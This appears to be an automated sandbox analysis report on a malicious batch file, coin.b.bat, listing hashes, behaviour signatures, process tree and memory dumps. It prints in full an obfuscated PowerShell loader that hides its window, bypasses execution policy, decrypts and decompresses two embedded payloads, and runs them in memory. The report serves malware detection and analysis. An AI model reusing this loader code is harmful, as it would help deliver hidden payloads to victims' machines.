Analysis

max time kernel: 119s
max time network: 126s
platform: windows7_x64
resource: win7-20240419-en
resource tags: arch:x64, arch:x86, image:win7-20240419-en, locale:en-us, os:windows7-x64, system
submitted: 25-05-2024 14:03
Static task: static1

Behavioral task: behavioral1
Sample: coin.b.bat
Resource: win7-20240419-en
4 signatures
150 seconds

Behavioral task: behavioral2
Sample: coin.b.bat
Resource: win10v2004-20240508-en
22 signatures
150 seconds
General

Target: coin.b.bat
Size: 91KB
MD5: 520c1190bbbe3a7359a6e72f76618245
SHA1: 50d5e441a97aad127e8d5ad8c28c848b3be02c5d
SHA256: 91813779ab003d08ee337226c9ba845aaca64098e9740e6aaf30a0c8fa833ee0
SHA512: 98ebc8ee9b1b1d7302a5771f1e6b174903a9c249459a98e57e8cd48ce8760997b414246c7c9f05d1ce08fa299dcc2496c389b4126af647e8f2a6e9f81d15f749
SSDEEP: 1536:HtkPhsAgh2YhIXwWIN0hdI7E5WQTpJlqb3mE81vT1dkYHcga3kplWaEDN4nVoLuR:NeCAgX+vIuEE5PlJAb3mE81L1dkhX3mV
Score: 8/10
Malware Config
Signatures

- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Runs PowerShell with the display window hidden.

- Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes: powershell.exe (PID 2212)

- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: powershell.exe (PID 2212), Token: SeDebugPrivilege

- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes: cmd.exe (PID 2320) wrote to memory of powershell.exe (PID 2212), 3 events
Processes

1. C:\Windows\system32\cmd.exe
   Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\coin.b.bat"
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of 1)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c8KZIt7om0GReP7FMEfz0SGLs2AMU+4GQioHMorebJA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aiKe9c65ZjFACO2EycWX2w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $MEUKW=New-Object System.IO.MemoryStream(,$param_var); $piWSe=New-Object System.IO.MemoryStream; $AfYrg=New-Object System.IO.Compression.GZipStream($MEUKW, [IO.Compression.CompressionMode]::Decompress); $AfYrg.CopyTo($piWSe); $AfYrg.Dispose(); $MEUKW.Dispose(); $piWSe.Dispose(); $piWSe.ToArray();}function execute_function($param_var,$param2_var){ $eWsMy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mbrUF=$eWsMy.EntryPoint; $mbrUF.Invoke($null, $param2_var);}$OUKqL = 'C:\Users\Admin\AppData\Local\Temp\coin.b.bat';$host.UI.RawUI.WindowTitle = $OUKqL;$FwHhv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($OUKqL).Split([Environment]::NewLine);foreach ($oOibP in $FwHhv) { if ($oOibP.StartsWith(':: ')) { $aqXWs=$oOibP.Substring(3); break; }}$payloads_var=[string[]]$aqXWs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

File                                                                   Filesize
memory/2212-4-0x000007FEF4B5E000-0x000007FEF4B5F000-memory.dmp         4KB
memory/2212-5-0x000000001B6A0000-0x000000001B982000-memory.dmp         2.9MB
memory/2212-6-0x0000000001E70000-0x0000000001E78000-memory.dmp         32KB
memory/2212-7-0x000007FEF48A0000-0x000007FEF523D000-memory.dmp         9.6MB
memory/2212-8-0x000007FEF48A0000-0x000007FEF523D000-memory.dmp         9.6MB
memory/2212-9-0x000007FEF48A0000-0x000007FEF523D000-memory.dmp         9.6MB
memory/2212-10-0x000007FEF48A0000-0x000007FEF523D000-memory.dmp        9.6MB